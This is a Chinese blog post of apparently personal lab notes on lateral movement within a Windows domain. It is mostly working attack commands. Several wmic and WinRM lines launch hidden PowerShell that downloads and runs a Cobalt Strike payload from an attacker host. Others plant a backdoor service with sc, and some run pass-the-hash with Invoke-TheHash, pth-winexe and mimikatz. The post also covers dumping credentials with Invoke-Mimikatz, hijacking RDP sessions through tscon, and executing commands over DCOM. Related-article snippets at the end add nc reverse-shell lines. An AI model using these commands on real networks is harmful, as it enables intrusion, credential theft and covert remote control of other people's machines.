内网中的简单横向移动

最新推荐文章于 2024-07-23 23:14:45 发布
最新推荐文章于 2024-07-23 23:14:45 发布
阅读量1.6k 收藏 8
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43271194/article/details/110392915
版权

横向移动

WMI

简介
  • 全程Windows管理规范,从03开始一直存在
  • 由一系列工具组成,可以在本地或者远程管理计算机系统
  • Windows默认不会讲WMI的操作记录在日志中
利用
条件

  • WMI服务开启,135端口,默认开启

  • 防火墙允许135,445等端口通信

    测试方法

    nmap -p 135 ip
telnet ip 135
......

  • 管理员权限,及本地管理员组

wmic

用powershell联动cs

wmic /node:<目标 ip> /user:<用户或域用户> /password:<密码> process call create "powershell.exe -nop -w hidden -c\"IEX ((new-object net.webclient).dowloadstring('http:\\192.168.95.10:8080/a'))\""

使用方法

测试一

先使用cs生成ps载荷
在这里插入图片描述

信息填写好后,启动
在这里插入图片描述

得到执行语句

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.95.128:8080/a'))"

然后在DC上执行下面语句

wmic /node:192.168.95.12 /user:TEST\administrator /password:hxy0609. process call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.95.128:8080/a'))\""

结果如下
在这里插入图片描述

成功上线

在这里插入图片描述

测试二

使用命令

wmic /node:192.168.95.12 /user:TEST\win2008 /password:user2008. process call create "cmd.exe /c ipconfig >c:\ip.txt"

然后使用

type \\192.168.95.12\c$\ip.txt

在这里插入图片描述

可以连接

wmiexec.vbs

使用方法

cscript wmiexec.vbs /shell 192.168.95.12 TEST\administrator password.
在这里插入图片描述

不知道什么原因,拿到shell但是大部分命令无法使用

Invoke-TheHash.ps1

工具

使用方法

同时加载Invoke-WMIExec.ps1、Invoke-TheHash.ps1

利用已有管理员hash,批量撞指定网段机器,得到可用wmic连接的机器

Invoke-TheHash -Type WMIExec -Target 192.168.95.0/24 -Domain test -Username administrator -Hash b82b9c9b4bf7377f2b2e210c84a3ce11

Hash可以用mimikatz去抓

结果如下
在这里插入图片描述

kali自带pth工具-pth-winexe

使用方法

pth-winexe -U administrator%hxy0609. --system --ostype=1 //192.168.95.12 cmd

结果

在这里插入图片描述

Remote Service Creation

控制服务,可以通过SMB安排任务

命令为

sc \\192.168.95.12 create ExampleService binpath="程序路径"

sc \\192.168.95.12 start ExampleService

使用方法

先cs创建一个服务型exe后门

在这里插入图片描述

然后使用sc创建服务

sc \\192.168.95.12 create ExampleService binpath="c:\service.exe"

然后执行

sc \\192.168.95.12 start ExampleService

在这里插入图片描述

再看看cs,成功上线

在这里插入图片描述

Remote Desktop Protocol

远程桌面协议

RDP hijacking

在某些情况管理员远程登录了机器而没有注销掉,这个时候就可以利用这个来直接无需密码切换到该账号上

在system权限下,tscon.exe只需要使用目标会话编号,就能立即获取目标用户的桌面,且无明显痕迹

演示

  • mstsc启动远程桌面并连接

在这里插入图片描述

  • query user:目标机查看会话

在这里插入图片描述

  • JuicyPotato.exe -p "tscon 2":本地提权并获取目标桌面
PowerShell Remoting

  • winRM服务,在win2012后默认开启,也可命令开启winrm quickconfig

  • 连接方法:Enter-PSSession -Computername TARGET

  • 还可以使用猕猴桃获取远程机器的账号、密码

    • 导入脚本:Import-Module .\mimikatz.psl
    • 使用命令:Invoke-Mimikatz -DumpCreds -ComputerName win2008.test.local(域机器名+域名)
Task Scheduler

  • 计划任务,需要administrator权限

  • 本地执行:SCHTASKS /Create /SC ONCE /TN spawn /TR calc /ST 21:46 在21:46开启一个计算器

  • 远程使用

SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN “Atomic task”(计划名称) /TR “#{task_command}”(计划程序) /SC daily /ST #{time}
**task_command只能是文件,不能带参数或者命令
```

  • 删除一个计划:SCHTASKS /Delete /TN spawn /F >nul 2>&1
PsExec

  • 微软服务

  • 通过ipc$连接,然后释放psexesvc.exe到目标机器

  • 通过服务管理SCManager远程创建psexecsvc服务,并启动服务

  • 客户端连接执行命令,服务端启动相应的程序并执行回显数据

  • 获取目标的cmd环境:PsExec64.exe \\win2008(域内主机名) cmd

在这里插入图片描述

  • cs中也有自带:目标列表->右键->Jump->psexec64,再指定账号、密码、监听(smb) 和 session(administrator)

在这里插入图片描述

配置

在这里插入图片描述

DCOM

  • 一个中间件,支持交互

  • 枚举所以的DCOM对象:Get-CimInstance win32_DCOMApplication

  • 对于可以进行命令执行的DCOM,则可利用进行横向移动,比如:

  • MMC20.APPLICATION COM OBJECT

  • 攻击机powershell内执行:

$a =[System.Activator]::CreateInstance([type]::GetTypeFromProgID(“MMC20.Application.1”,“192.168.95.128”))

$a.Document.Activeview.ExecuteShellCommand("cmd",$null,"/c hostname > c:\fromdcom.txt","7")
```
  • 目标机上可找到c:\fromdcom.txt,更换命令即可获得会话
Password Spray
WinRM远程服务管理

  • 查看与开启(管理员权限+powershell):Get-Service WinRMEnable-PSRemoting –Force

  • 第一次使用要添加信任

Set-Item WSMan:localhost\client\trustedhosts -value
Restart-Service WinRM
```

  • 反弹一个cs会话

Invoke-Command -ComputerName 192.168.95.12(远程地址) -ScriptBlock { powershell.exe -nop -w hidden -c “IEX((new.object net.webclient).downloadstring(‘http://192.168.0.108:8080/a’))”} -credential administrator
```

  • 反弹一个shell:Enter-PSSession -ComputerName 192.168.3.73 -Credential administrator
winrs工具

  • 使用:winrs -r:192.168.95.12 -u:test\administrator -p:hxy0609. "ipconfig"

  • cs中也有,目标列表->右键->Jump->winrm64,完成设置即可运行

  • 远程执行脚本:Invoke-Command -ComputerName $ip -FilePath .\*.ps1 -credential $Cred ——没讲这个,待验证

Pass-the-Hash

  • hash传递攻击

  • 猕猴桃内:sekurlsa::pth /user:administrator /domain:test /ntlm:#HASH /run:cmd.exe

  • 微软防护LocalAccountTokenFilterPolicy && 绕过

Pass-the-Ticket
  • 票据传递:黄金、白银
Amire0x
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透之横向移动
balalawb的博客
11-01 82
横向移动
绕过限制对某内网进行横向移动.pdf
11-25
内网渗透
内网渗透测试:内网横向移动基础总结
从事厨房信息化行业,万能对接所有点餐系统,kds,智能控菜,酒店协调软件
06-12 210
Windows 7为跳板机用户名:douser密码:Dotest123Windows server 2008为域控(主机名:WIN-ENS2VR5TR3N)用户名:administrator密码:Liu78963攻击者已经获得了Windows7的权限,想要以Windows7作为跳板机进一步渗透内网的Windows server 2008,并且攻击者已经在跳板机上面通过socks代理等技术使自己可以访问到内网的Windows server 2008。
红蓝对抗下的内网横向移动渗透技术详解
lurenjia404的博客
07-02 1856
本文主要介绍了利用远程服务进行横向渗透的方法,读者阅读本章内容后就能够理解,红队人员一旦通过外部某一个点进入了企业内部网络之,那么内网所有的安全防护设备将会形同虚设,红队人员在内网获取核心靶标的系统权限如同探囊取物。因此,如何有效地建立内网横向渗透安全防护体系就成了大部分企业及蓝队防守人员值得思考的问题,笔者希望通过本章对红队人员进行横向渗透所常利用的手法的介绍,读者能够对内网安全体系建设引起更多的重视和思考。
内网横向移动小结
qq_61475980的博客
03-19 1796
Windows-Mimikatz 适用环境:微软为了防止明文密码泄露发布了补丁 KB2871997,关闭了 Wdigest 功能。当系统为 win10 或 2012R2 以上时,默认在内存缓存禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。1、在线读2、离线读(解决Mimikatz被拦截)Procdump是微软官方的工具,可在命令行将lsass导出且杀软不会拦截下载之后3、解决高版本读取问题。
简单内网横向移动
最新发布
m0_74326506的博客
07-23 941
内网,通过网站漏洞打进一台机器,进行存货扫描,扫到不同网段的机器,然后经过代理打进不同网段的机器,这种叫纵向移动,如果扫到同网段的机器,而且这台机器除了正常端口开放外,没有安装其他任何服务,这可以经过横向移动,打进这台同网段的机器。sc命令可以用来注册删除查询系统服务,如果创建一个服务与木马绑定,则可以实现上线,但是一会就掉线,因为要和服务管理器进行通信,若是异常,明显这个创建的服务并不是正常的服务,所以服务管理器则会终止服务。创建成功,成功上线,删掉计划任务后,msf依旧不会掉线。
内网渗透之横向移动ipc
m0_62207170的博客
04-21 755
内网渗透之横向移动ipc
内网渗透——横向移动
LainWith的博客
10-09 2402
目录环境利用Windows计划任务【借助明文账密】利用 at 建立连接利用 schtasks 建立连接哈希值传递攻击哈希传递攻击适用情况知识背景PTH漏洞原理实操PTKPTT——MS14-068方式1:使用mimikatz方式2:使用kekeo方式3:利用本地票据(需管理员权限)Impacket的Atexec【支持明文&哈希】其他协议——SMB服务利用使用psexec使用smbexec【支持明文&哈希】其他协议——WMI服务利用【支持明文&哈希】1. 自带WMIC命令,明文传递,无
内网安全】 横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
今天是几号的博客
03-26 1148
在Win10,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic。这几个端口都是与文件共享和打印机共享有关的端口,而且在这几个端口上经常爆发很严重的漏洞。安装使用:Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它。
内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
今天是几号的博客
04-02 1203
当Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号的dNSHostName属性不具有唯一性,域普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务获取域控机器账户的证书,导致域普通用户权限提升为域管理员权限。
032-内网横向移动学习备忘录1
08-04
1 . 1 扩 展 图 1 . 2 络 环 境 1 . 3 简 述 2 . 1 利 条 件 2 . 2 利 式 2 . 3 I P C 相 关 的 命 令 3
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
06-22
本文将深入探讨“红队内网攻防渗透”,重点介绍内网对抗横向移动策略、不同入口差异、上线切换技巧,以及利用IPC管道、AT任务、SC服务、Impacket工具套件和UI插件等技术手段。 首先,横向移动内网渗透的关键...
企业内网横向渗透检测和拦截实践.pdf
09-11
企业内网横向渗透检测和拦截实践 安全众测 网络安全 法律法规 渗透测试 移动安全
内网的主机密码抓取
Amire0x的小乐园
11-29 2550
密码抓取 Mimikatz mimikatz的几大运行方式 使用前先将对应版本的mimikazi传上去 运行如下 命令不支持粘贴,不区分大小写 基本使用 基于win2003测试 列出导出凭证 crypto::certificates 获得debug权限(需要debug权限来执行一些mimikatz命令) privilege::debug 提升成功则会返回 OK 获取所有可用的提供者凭据,可得到当前账户的密码 sekurlsa::logonpasswords 查看token tok
内网端口转发小技巧
Amire0x的小乐园
11-30 1654
端口转发 NC 反向连接 kali开启监听 nc -lnvp 7777 目标返向连接 nc -e cmd.exe 192.168.95.128 7777 可以执行命令 正向连接 目标开启监听 nc -l -p 5555 -e cmd.exe kali连接 nc -nvv 192.168.95.12 5555 执行命令 lcx 外网无法访问内网,但内网可访问外网 client:转发自己的3389端口到远程端口7777上 lcx.exe -slave rhost
内网常见域内攻击
Amire0x的小乐园
11-30 1273
域内攻击 kerberos攻击 利用黄金票据+dcsync获取密码 先获取黄金票据 获取密码 lsadump::dcsync /user:用户 /domain:域名称 成功 域用户、密码枚举 工具 用户枚举 先导入 Import-Module .\DomainPasswordSpray.ps1 然后执行 Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -
内网渗透技术:横向移动学习笔记
"这篇内网横向移动学习备忘录主要探讨了在内网渗透测试横向移动技术,涉及网络环境的构建、攻击者的条件、利用方式以及相关的命令工具。作者通过一个具体的场景,即攻击者已经获得了Windows 7跳板机的权限,并且...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值